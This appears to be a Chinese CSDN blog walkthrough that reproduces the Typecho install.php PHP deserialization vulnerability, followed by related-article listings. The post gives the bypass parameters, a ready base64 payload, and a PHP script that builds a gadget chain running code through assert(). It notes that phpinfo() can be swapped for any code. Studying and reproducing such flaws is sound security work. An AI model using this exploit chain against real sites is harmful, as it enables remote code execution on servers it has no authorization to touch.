typecho反序列化漏洞原理及复现过程

最新推荐文章于 2023-12-27 20:19:08 发布
最新推荐文章于 2023-12-27 20:19:08 发布
阅读量1.7k 收藏 2
点赞数 6
分类专栏: 渗透测试(web渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/104653066
版权

漏洞介绍
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理
漏洞形成
由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
漏洞利用
思路:
由于install.php代码验证了finish参数,请求头HTTP_HOST,post数据__typecho_config,所以我们要加上这几个参数进行绕过
1.添加install.php?finish参数
http://localhost/typecho/install.php?finish=1
2.添加Referrer数据头为本地
http://localhost
3.添加post值__typecho_config=脚本运行得到的攻击代码
代码:

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

脚本源码:

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'phpinfo()';
        $this->_filter[0] = 'assert';
    }
}
$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));

之后在脚本里phpinfo()处替换代码即可生成对应注入语句
4.输入后效果
在这里插入图片描述
5.执行后效果:phpinfo被打印
在这里插入图片描述

卖N孩的X火柴
关注
专栏目录
typecho-1.1-15.5.12-beta.zip
03-17
Typecho 1.1-15.5.12 Beta 版本中的反序列化漏洞详解》 在IT安全领域,程序的漏洞是开发者和安全专家关注的重点。本文将详细探讨“typecho-1.1-15.5.12-beta.zip”压缩包中的Typecho 1.1版本至15.5.12 Beta版本中...
typecho反序列化漏洞复现
weixin_71090536的博客
09-05 366
通俗解释如下代码为:call_user_func()函数 调用 assert() 函数,将 "phpinfo()" 这个参数给到 assert() 函数中,下方代码也可写为:assert("phpinfo()");3. 在访问 typecho_1.0(14.10.10)_unserialize_phpinfo.php 页面时,找到 base64 编码的字符串。call_user_func():回调函数,是危险函数,可利用其构造后门。cookie:__typecho_config=恶意代码字段。
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 2167
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
精美扁平化自适应typecho后台主题Fresh.zip
01-17
精美扁平化自适应typecho后台主题Fresh 曾用名:PrettyFresh主题采用了目前最流行的Bootstrap前端开发框架与typecho进行深度适配;主题在继承typecho一贯简单高效风格的同时让其更加贴合现代年轻用户的审美。自适应+...
typecho主题模板,typecho后台模板
01-06
标题中的“typecho主题模板,typecho后台模板”指的是Typecho博客系统使用的界面设计和布局样式,即Typecho的前端展示部分。Typecho是一个轻量级的开源博客平台,允许用户自定义主题来改变博客的外观和用户体验。...
Typecho主题情侣博客Brave主题源码
最新发布
06-07
Typecho是一款轻量级的开源博客系统,深受许多个人及情侣博主的喜爱。它以其简洁的界面、易用的后台管理以及强大的自定义能力而受到欢迎。"Brave主题"是专为Typecho设计的一款独特主题,尤其适合情侣博主使用,为...
Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2
05-19
Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2...
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
Typecho代码审计-反序列化漏洞复现(超详细!!!)
小小小屿屿屿的博客
12-27 2845
本文以Typecho为靶场,通过代码审计,复现反序列化漏洞
typecho反序列化漏洞(详细过程
qq_61991235的博客
03-13 1833
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
CVE-2018-18753 Typecho 反序列化漏洞 分析复现
2301_77512689的博客
04-21 488
漏洞概述:typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意 PHP 代码。影响版本:typecho1.0(14.10.10)
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5239
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
typecho_1.0_14.10.10_unserialize
weixin_43886198的博客
12-21 808
typecho_1.0_14.10.10_unserialize 漏洞描述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 漏洞危害等级 高危 影响版本 typecho1.0(14.10.10) 漏洞复现 基础环境 组件 版本 OS Win10 Webserver MAMP PRO _PHP5.6.37 typecho 1.0(14.10.10) 网站安装 需要进入数据库创建一个typ
Typecho v1.1反序列化前台getshell漏洞分析
zzgslh的博客
01-18 1893
前言 什么是反序列化漏洞? PHP反序列化漏洞是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成任意文件读取、代码执行、getshell等一系列不可控的严重后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但原理基本相通。 具体介绍参考下篇文章。 漏洞介绍 1.Typecho是一个由中国团队开发的开源跨平台博客程序。它基于PHP5构
一次历史漏洞分析与复现的全部过程
HBohan的博客
02-26 2543
环境需求 系统:Windows10 中间件:https://dlcdn.apache.org/tomcat/tomcat-9/v9.0.58/bin/apache-tomcat-9.0.58-windows-x64.zip 数据库:用phpstudy携带的5.7.26版本即可 jspxcms安装包(部署到Tomcat用来复现):https://www.ujcms.com/uploads/jspxcms-9.0.0-release.zip jspxcms源码包(部署到IDEA进行分析):https://w
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
Typecho猫咪插件打造可爱个性化博客
资源摘要信息:"卡哇伊猫咪Typecho插件是一个专门为Typecho博客系统定制开发的插件。Typecho是一个简洁高效的PHP博客程序,适合个人博客搭建。本插件的目的是为了在Typecho平台上增加美观可爱的猫咪元素,提升用户...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值